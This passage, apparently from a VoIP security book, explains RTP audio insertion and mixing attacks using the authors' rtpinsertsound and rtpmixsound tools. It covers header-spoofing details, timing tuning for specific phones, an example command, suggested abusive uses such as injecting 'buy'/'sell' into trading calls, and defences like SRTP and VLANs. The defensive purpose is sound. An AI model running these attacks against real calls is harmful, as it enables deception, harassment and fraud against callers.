We introduced RTP in Chapter 3. RTP is universally used in VoIP and SIP systems to carry the media. We are not aware of any enterprise VoIP system that does not use RTP. RTP always rides on top of UDP. It doesn't make sense to use TCP, because it would add too much overhead and features such as retransmission of packets don't make sense for real-time data. Attacks against RTP are particularly nasty because they are simple and applicable in virtually any VoIP or SIP environment.
The time period over which audio is sampled and the rate that RTP packets are transmitted are determined by the codec. The transmission rate is fixed. Whether those packets actually arrive at a fixed rate at the receiving endpoint is dependent on the performance of the intervening network infrastructure and competition with other network traffic. RTP packets might be lost en route, might arrive at the receiving endpoint out of sequence, or might even be duplicated as they transit the network. Consequently, receiving endpoints are designed with the presumption that packets composing the audio stream will not arrive at the precise rate they were transmitted. Endpoints incorporate an audio "jitter buffer" and one or more algorithms to manipulate the characteristics of that jitter buffer in an attempt to produce the highest quality audio playback. The jitter buffer keys on RTP header information (for example, the sequence number, SSRC, and timestamp) to accomplish its function. If an attacker is in a position to spoof those RTP header data (and perhaps the fields of lower layer protocol headers), he can trick a receiving endpoint to reject RTP messages from the legitimate endpoint in favor of the audio carried by the RTP messages impersonating legitimate packets.
The G.711 codec is the most commonly used codec, so we chose to concentrate first on attacking RTP media streams carrying G.711 payloads. Later generations of our tools may support additional codecs. G.711 has two flavors: u-law (pronounced mu-law ) and a-law. u-law is popular in North America and Japan, whereas a-law is popular in Europe. At the time of this writing, the tools support G.711 u-law-encoded audio.
G.711 u-law-encoded audio is carried as a 160-byte payload within an RTP message. RTP messages are transmitted within UDP packets at a 50 Hz rate (in other words, every 20 ms). The sequence number field within the RTP header begins at some random number and increases monotonically by 1 with each RTP packet transmitted. For G.711, the timestamp begins at some random number and increases monotonically by 160 with each RTP packet transmitted. The SSRC is assigned a random number and remains fixed for the session. A SIP re-INVITE message could result in an endpoint or audio codec change, in which case the RTP header values are reinitialized and possibly other protocol layer values change upon which the tools depend (for example, IP addresses and UDP port numbers ). At the time of this writing, the tools only support the minimum 12-byte RTP header and don't automatically detect and compensate for audio session modifications.
One attack is to insert or mix in new audio into an active conversation. The idea here is that one or both parties hear noise, words, or some other sound. Inserting audio causes the real audio to be overwritten. Mixing audio causes the new sounds to be added or merged in. If the new sound has a low volume, the listener will interpret it to be background noise. Figure 13-7 illustrates this attack.
The tool we developed to demonstrate this attack is described next .
The rtpinsertsound and rtpmixsound are Linux-based command-line tools. The usage information for the two tools is the same:
./<tool name> EthernetInterface TargetSourceIP TargetSourcePort TargetDestinationIP TargetDestinationPort TcpdumpFilename -f SpoofFactor j JitterFactor h -v Mandatory parameters: EthernetInterface The Ethernet interface to write to. TargetSourceIP an IPv4 address in dotted notation. TargetSourcePort the UDP port from which the targeted audio stream is being transmitted. TargetDestinationIP an IPv4 address in dotted notation. TargetDestinationPort the UDP port where the audio stream is being received. SoundFilename Contains the audio to mix or insert into the target audio stream. If this file has a .wav extension, the tool assumes it is a WAVE file. Otherwise, it is assumed to be a tcpdump-formatted file, containing raw RTP/UDP/IP/Ethernet packets. Optional Parameters: -f SpoofFactor Range of SpoofFactor is: 1000 to 1000, default = 2 when this option is not present on the command line -j JitterFactor Range of JitterFactor is: 0 to 80, default = 80 when this option is not present on the command line -h Help prints the command line usage. -v Verbose verbose output.
The rtpinsertsound tool inserts / replaces RTP audio messages representing the playback of the prerecorded bogus audio into the target audio stream. The rtpmixsound tool also inserts/replaces RTP audio messages into the target audio stream, but each message is the real-time mixture of the most recently received legitimate RTP message's audio payload and the next bogus prerecorded RTP message's audio payload.
The sound (in other words, the audio) to insert or mix into an audio stream must be in a .wav (WAVE) or tcpdump-formatted file specified to a tool on its command line, as shown previously. We performed tests using a variety of .wav files we pulled off the Internet. The tcpdump file must be composed of sequential RTP/UDP/IP/Ethernet messages, where the RTP payloads are encoded using the G.711 u-law codec (PCMU). For our tests, we produced these sound files using the Asterisk open -source IP PBX. We wrote Asterisk "call files" to call a VoIP phone and play back the content of the .wav or .gsm file specified by the call file. We then used Wireshark to observe that the audio session negotiation resulted in the G.711 u-law codec being selected for transmission of audio from the Asterisk IP PBX to the VoIP phone, and we captured those RTP packets using Wireshark. You can use Wireshark post-capture filtering to display only the downstream (in other words, Asterisk IP PBX to VoIP phone) RTP packets. You then have the option of saving to a tcpdump file only the displayed packets.
Each tool reads the prerecorded audio from the file specified on its command line into memory before attempting to insert or mix that prerecorded audio into the targeted audio stream. For a tcpdump file, the Ethernet, IP, and UDP layer protocol headers are stripped off each packet as it is loaded into memory. Each tool enforces an arbitrary limit of 30 seconds of prerecorded audio. Audio in excess of a 30-second playback limit is ignored. A G.711 u-law codec audio stream of 30 seconds consumes approximately 252KB of memory (30 sec * 50 RTP messages/sec * 172 bytes/message = 258,000 bytes)a modest amount by today's standard. The prerecorded audio is memory resident to avoid the delays that might otherwise be required to obtain it from a mechanical medium in real-time while the tool attempts to mix or insert it into the target audio stream.
Each tool requires the ability to monitor the call to be attacked . This is necessary to spoof the inserted or mixed audio. Because neither tool presumes an MITM position, it's assumed that the receiving VoIP endpoint is going to receive the legitimate audio stream and the bogus audio stream. This represents twice the number of audio packets the receiving endpoint expects. Both tools employ several techniques to trick the receiving VoIP endpoint into using the bogus audio, rather than the legitimate audio:
Spoofing the RTP protocol header sequence number SpoofFactor is added to the value of the sequence number in the RTP protocol header of a newly received packet bearing a legitimate RTP message. The new value is written into the RTP protocol header of the next packet transmitted by the tool.
Spoofing the RTP protocol header timestamp SpoofFactor is multiplied by 160 and added to the timestamp in the RTP protocol header of a newly received packet bearing a legitimate RTP message. The new value is written into the RTP protocol header of the next packet transmitted by the tool.
Spoofing the RTP protocol header synchronization source identification The value of SSRC in the RTP protocol header of a newly received packet bearing a legitimate RTP message is copied into the RTP protocol header of the next packet transmitted by the tool.
Spoofing the UDP protocol header source port The source port in the UDP protocol header in packets transmitted by the tool is set equal to TargetSourcePort .
Spoofing the UDP protocol header destination port The destination port in the UDP protocol header in packets transmitted by the tool is set equal to TargetDestinationPort .
Spoofing the IP protocol header source IP address The value of the source IP address in the IP protocol header in packets transmitted by the tool is set equal to TargetSourceIPAddr .
Spoofing the IP protocol header identification SpoofFactor is added to the value of the identification field in the IP protocol header of a newly received packet bearing a legitimate RTP message. The new value is written into the IP protocol header of the next packet transmitted by the tool.
Spoofing the Ethernet protocol header source MAC address The value of the source MAC address in the Ethernet protocol header in packets bearing legitimate RTP messages from the target audio stream is copied into the source MAC address of the Ethernet protocol header of the next packet transmitted by the tool.
The reception of a (presumably) legitimate audio packet from the transmitting VoIP endpoint drives the tool to output the next bogus RTP message based on its prerecorded, memory resident audio. In the case of the rtpmixsound tool, the prerecorded audio is converted from 8-bit, nonlinear G.711 PCMU to 16-bit linear PCM when it is loaded into memory. A G.711 u-law datum can't be added directly to another G.711 u-law datum (well, you can, but you won't achieve the desired result). Each 8-bit, nonlinear G.711 ulaw audio byte in the incoming RTP payload must first be converted to a 16-bit linear PCM value, and then added to the corresponding 16-bit linear PCM value of the prerecorded, preconverted audio, and finally transformed back into an 8-bit, G.711 u-law datum.
The JitterFactor comes into play when determining when to transmit a packet. The JitterFactor is entered as a percentage of the target audio stream's transmission interval. The transmission interval using the G.711 codec is 20 ms. For example, a JitterFactor = 10 means (10% * 20 ms) = 2 ms. This means the bogus audio packet won't be output until about 2 ms prior to the time the next legitimate audio packet is expected to be received. The range is 0 to 80 percent. A value of 80 percent, the default, essentially means to output the bogus packet as soon as possible following the reception of the legitimate audio packet triggering the bogus output. Do not enter a value too close to 0 because the timing is not extremely accurate and you take the risk that the receiving VoIP endpoint gets the next legitimate RTP packet before the bogus RTP packet. Output of bogus packets by the tool is close-looped with the reception of legitimate audio packets from the target audio stream. At the time of this writing, the tool freezes if legitimate audio packets in the target stream are no longer received while prerecorded audio remains to be inserted (or mixed and inserted) into the target audio stream.
Why is a JitterFactor even needed? We have discovered that at least one of our VoIP phones is sensitive to when the bogus audio packet is received relative to the next legitimate audio packet. If the next bogus packet is output by the tool as soon as possible following the reception of a legitimate packet (say within a couple of hundred usec), the Snom 190 SIP phone seems to reject it in favor of the following legitimate audio packet received about 20 ms later. However, if we delay the output of the bogus packet until a few milliseconds prior to the time-of-day the next legitimate packet is expected to be received, then the Snom 190 phone accepts the bogus audio packet and appears to reject the next legitimate audio packet received a few milliseconds later. The Grandstream BT-100 SIP phone and the Avaya 4602 IP phone (with a SIP load) were not sensitive to when the bogus packet was received within the transmission interval. The default JitterFactor = 80 (in other words, as soon as possible) was fine for those phones.
While a negative SpoofFactor can be entered, so far we've only observed successful spoofing with positive SpoofFactor entries. Though the default value for the SpoofFactor parameter is 2, usually a value of 1 is adequate. Higher values have also been successful (for example, 10 or 20). The phones we've been successful in spoofing appear to prefer audio packets with the more advanced RTP header and IP header values.
It should be apparent at this point that only one side of the call is affected by each tool. The person on the receiving end of the target audio stream hears the inserted/ mixed audio. The person on the transmitting end of the target audio stream is oblivious until the person on the receiving end of the target audio stream begins to inquire what the heck is going on. The VoIP phones we've successfully targeted with the rtpinsertsound tool play the inserted audio. The legitimate audio is effectively muted. So, if the person on the receiving end of the bogus audio begins to question what is going on, the person on the transmitting end will hear him, but the receiving end won't be able to hear the reply of the person on the transmitting end until the playback of the bogus audio is complete. The advantage of the rtpmixsound tool is that the person on the target receiving end is able to hear the person on the target transmitting end continue to speak throughout the playback of the bogus prerecorded audio.
A compilation directive determines whether the object code of a tool is produced with Ethernet layer spoofing or whether IP layer spoofing is sufficient. Our testing to date has demonstrated that Ethernet layer spoofing is not required. The tool executes faster when it is not required to spoof at the Ethernet layer.
To use either tool, you first need access to the network segment where the call is being transmitted. For the following example, we called extension 3000 from extension 3500. As the call was being set up, we used Wireshark to monitor the signaling to gather UDP ports. We, of course, knew the IP addresses. An example of where to find the UDP ports in the SIP INVITE and OK requests is as follows :
Request-Line: INVITE sip:3000@ser_proxy SIP/2.0 Method: INVITE Resent Packet: False Message Header Via: SIP/2.0/UDP 10.1.101.35;branch=z9hG4bKd3eb18e03c927842 From: "GS 2" <sip:3500@ser_proxy>;tag=6a81db91b12d3fac To: <sip:3000@ser_proxy> Contact: <sip:firstname.lastname@example.org> Supported: replaces Call-ID: email@example.com CSeq: 6891 INVITE User-Agent: Grandstream BT110 22.214.171.124 Max-Forwards: 70 Allow: INVITE,ACK,CANCEL,BYE,NOTIFY,REFER,OPTIONS,INFO,SUBSCRIBE Content-Type: application/sdp Content-Length: 384 Message body Session Description Protocol Session Description Protocol Version (v): 0 Owner/Creator, Session Id (o): 3500 8000 8000 IN IP4 10.1.101.35 Session Name (s): SIP Call Connection Information (c): IN IP4 10.1.101.35 Time Description, active time (t): 0 0 Media Description, name and address (m): audio 5004 RTP/AVP 0 8 4 18 2 9 111 125 Session Initiation Protocol Status-Line: SIP/2.0 200 Ok Status-Code: 200 Resent Packet: False Message Header Via: SIP/2.0/UDP ser_proxy;branch=z9hG4bKa73e.301b21f1.0 Via: SIP/2.0/UDP 10.1.101.35;branch=z9hG4bKd3eb18e03c927842 Record-Route: <sip:ser_proxy;ftag=6a81db91b12d3fac;lr=on> From: "GS 2" <sip:3500@ser_proxy>;tag=6a81db91b12d3fac To: <sip:3000@ser_proxy>;tag=75jmhn8jwu Call-ID: firstname.lastname@example.org CSeq: 6891 INVITE Contact: <sip:email@example.com:2051;line=xuahyhk7> User-Agent: snom190/3.60x Allow: INVITE, ACK, CANCEL, BYE, REFER, OPTIONS, NOTIFY, SUBSCRIBE, PRACK, MESSAGE, INFO Allow-Events: talk, hold, refer Supported: timer, 100rel, replaces Content-Type: application/sdp Content-Length: 218 Message body Session Description Protocol Session Description Protocol Version (v): 0 Owner/Creator, Session Id (o): root 1711562323 1711562324 IN IP4 10.1.101.30 Session Name (s): call Connection Information (c): IN IP4 10.1.101.30 Time Description, active time (t): 0 0 Media Description, name and address (m): audio 60722 RTP/AVP 0 125
Note that the tools work equally well in non-SIP environment. We tested them with both Cisco SCCP and Avaya H.323 IP phones. Of course in these environments, you will have to look at different messages to identify the media ports. Another easy way to get the ports is to use Wireshark to look at the actual RTP streams. Each RTP packet is built on top of UDP and IP, so you can collect the IP addresses and ports from packets flowing in the direction you want to attack. Remember that the tool inserts/ mixes audio in only one direction.
An example command invocation for this attack is as follows:
./rtpsoundmix eth0 10.1.101.35 5004 10.1.101.30 60722 sound_to_mix
This command will mix in the contents of the file sound_to_mix into the RTP stream transmitted from extension 3500 (IP address 10.1.101.35) to extension 3000 (10.1.101.30).
You can run multiple copies of the tools to affect multiple calls. You can also use two invocations of the tools to affect both sides of the call. You can also place these commands in a script, with a delay, if you would like to insert/mix in repeatedly a short sound, such as a word or noise.
These tools enable many types of attacks. All of them follow the same basic format, but with different audio to be inserted or mixed in. A few examples that come to mind include the following:
For any calls, insert or mix in background noise to make the call quality sound poor.
For any call, insert or mix in derogatory language, making the target think they are being abused.
For a call to a spouse, mix in background sounds from a gentlemen's club, poker game, or something else the person should not be doing.
For a customer support call, mix in abusive phrases, making the customer think they are being insulted.
For trading, insert words such as "buy" or "sell" to see if the customer can be tricked into making the wrong transaction.
If you are at home goofing off, mix in office sounds.
Because you are observing the target RTP stream, you can also listen to it and "time" execution of the command. In other words, you can listen and wait for the right time and then run a command that inserts a word or phrase at an exact moment. The tool runs and starts up quickly enough to allow this. Keep in mind that you can run multiple copies of these tools, so if you have access to a portion of the network carrying many calls, you can affect any and all of them. This includes calls being transmitted to the media gateway and over the wide area network (WAN).
These attacks can irritate, insult, and confuse the target. Certain attacks could seriously undermine the credibility of individuals or enterprises . Attacks that add noise could make users think the VoIP system is not performing well.
These attacks target RTP, which is used in virtually all VoIP environments, including those using proprietary signaling protocols. For these attacks to take place, the attacker needs access to your internal network. These attacks are also possible from an external network if you send RTP over the Internet or some other public voice network.
You can employ several countermeasures to address these RTP manipulation attacks. These are described next.
You can stop RTP manipulation attacks to some degree by encrypting the audio. If the audio is encrypted, it is impossible to read in the audio and mix in new sounds. You can insert new audio, but even if the target can be tricked into accepting it, it will sound like noise when you decrypt it. Even this would only be possible if the RTP packets are not authenticated. Most enterprise-class VoIP products offer RTP encryption as an option. Unfortunately, it is still rarely used.
Secure RTP (SRTP), http://www.ietf.org/rfc/rfc3711.txt, is a standard providing encryption and authentication of RTP (and RTCP). SRTP provides strong encryption for privacy ( prevents mixing) and optional authentication that allows endpoints to differentiate legitimate from bogus RTP packets. A substantial number of vendors support SRTP as an option, but again, it is rarely implemented. ZRTP, promoted by Phil Zimmermann of PGP fame, is another option for encrypting RTP streams.
Most enterprise-class SIP systems use VLANs to separate voice and data. While VLANs are designed primarily to assist with performance, they also provide a layer of separation and security. With VLANs and properly configured LAN switches, you can make it more difficult for a PC to monitor and insert bogus RTP packets.
The use of softphones on PCs can defeat the use of VLANs as a security measure. When a softphone is used, RTP packets, presumably from the softphone, must be accepted by the network.
The rtpinsertsound and rtpmixsound tools support VLANs. If compiled to do so, they will write packets with the correct VLAN and QoS values.
It isn't practical to place a VoIP/SIP firewall "in front" of all the VoIP phones. A VoIP/SIP firewall should, however, be used when VoIP is exchanged with a public network. A VoIP/ SIP firewall can monitor incoming and outgoing RTP and detect audio insertion/mixing attacks. VoIP/SIP firewalls are available from several vendors, including SecureLogix (http://www.securelogix.com), Sipera (http://www.sipera.com), Borderware (http://www.borderware.com), and Ingate (http://www.ingate.com). Some traditional firewalls, Intrusion Detection Systems (IDS), and Intrusion Prevention Systems (IPS) also provide support for VoIP and RTP.